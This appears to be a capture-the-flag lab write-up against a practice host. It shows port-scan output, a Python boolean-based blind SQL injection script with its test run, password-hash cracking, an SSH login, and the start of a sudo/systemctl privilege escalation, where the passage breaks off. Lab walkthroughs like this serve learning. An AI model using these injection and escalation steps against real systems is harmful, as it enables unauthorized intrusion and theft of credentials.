[~] The config file is expected to be at "/home/kali/.rustscan.toml" [!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers [!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. Open 10.10.93.26:22 Open 10.10.93.26:80 [~] Starting Script(s) [>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")
[~] Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-17 04:23 EDT Initiating Ping Scan at 04:23 Scanning 10.10.93.26 [2 ports] Completed Ping Scan at 04:23, 0.29s elapsed (1 total hosts) Initiating Parallel DNS resolution of 1 host. at 04:23 Completed Parallel DNS resolution of 1 host. at 04:23, 0.00s elapsed DNS resolution of 1 IPs took 0.00s. Mode: Async [#: 5, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0] Initiating Connect Scan at 04:23 Scanning 10.10.93.26 [2 ports] Discovered open port 22/tcp on 10.10.93.26 Discovered open port 80/tcp on 10.10.93.26 Completed Connect Scan at 04:23, 0.30s elapsed (2 total ports) Nmap scan report for 10.10.93.26 Host is up, received conn-refused (0.30s latency). Scanned at 2023-06-17 04:23:48 EDT for 1s
PORT STATE SERVICE REASON 22/tcp open ssh syn-ack 80/tcp open http syn-ack
It appears that this server has enabled SSH and HTTP ports. Let’s first visit website and take a look
After taking a look at this website We can notice that this page appears to have an SQL injection vulnerability.
When we input “1 and 1 = 1” it displays correctly, but when we input “1 and 1 = 0 –” it returns an error.
0x01 SQLI
Here, we can utilize “SQLME0w” developed by Steven Meow and with slight modifications, to extract data from the SQL.
def boolean_based_blind(condition): url = 'http://10.10.93.26/products/' # change me query = condition # change me response = requests.get(url+query+"--") # maybe change me if int(response.status_code) == 200: # change me to other keyword or length return True else: return False
def test(): meow = boolean_based_blind("1 and 1 = 1 ") print("Intend True: ", meow) meowmeow = boolean_based_blind("1 and 1 = 0") print("Intend False: ", meowmeow) if meow and not meowmeow: print("✅ Test success 🐱🐱🐱🐱🐱🐱🐱🐱🐱") else: print("❌ Test fail 😿😿😿😿😿😿😿😿😿😿") # print(boolean_based_blind("1=1")) # Return True # print(boolean_based_blind("1=0")) # Return False
🐱 (0) System Test 🐱 (1) Get Current DB 🐱 (2) Get All DBS 🐱 (3) Get Tables 🐱 (4) Get Columns 🐱 (5) Get Data Your Option : 0 Threads (Suggest 10): 4 Intend True: True Intend False: False ✅ Test success 🐱🐱🐱🐱🐱🐱🐱🐱🐱
Afterward, we can retrieve the first flag from the “user” table.
Simultaneously, we can also obtain the username and hashed password of an account named “server-admin” from the “system_user” table. However, since the password appears to be hashed, we can attempt to crack it using John the Ripper (John)
great! we have server-admin password let’s try to log in
System information disabled due to load higher than 1.0
8 packages can be updated. 0 updates are security updates.
################################################################################ # Ducky Inc. Web Server 00080012 # # This server is for authorized Ducky Inc. employees only # # All actiions are being monitored and recorded # # IP and MAC addresses have been logged # ################################################################################ Last login: Wed Aug 12 20:09:36 2020 from 192.168.86.65 server-admin@duckyinc:~$ ls flag2.txt server-admin@duckyinc:~$ cat flag2.txt thm{4xxxxxxxxxxe}
0x02 Privilege Escalation
The first thing we should do is to examine our own permissions to determine what actions we are allowed to perform.
1 2 3 4 5 6 7
server-admin@duckyinc:~$ sudo -l Matching Defaults entries for server-admin on duckyinc: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User server-admin may run the following commands on duckyinc: (root) /bin/systemctl start duckyinc.service, /bin/systemctl enable duckyinc.service, /bin/systemctl restart duckyinc.service, /bin/systemctl daemon-reload, sudoedit /etc/systemd/system/duckyinc.service
uhmmm… it appears that we have the ability to execute certain systemctl operations with root privileges.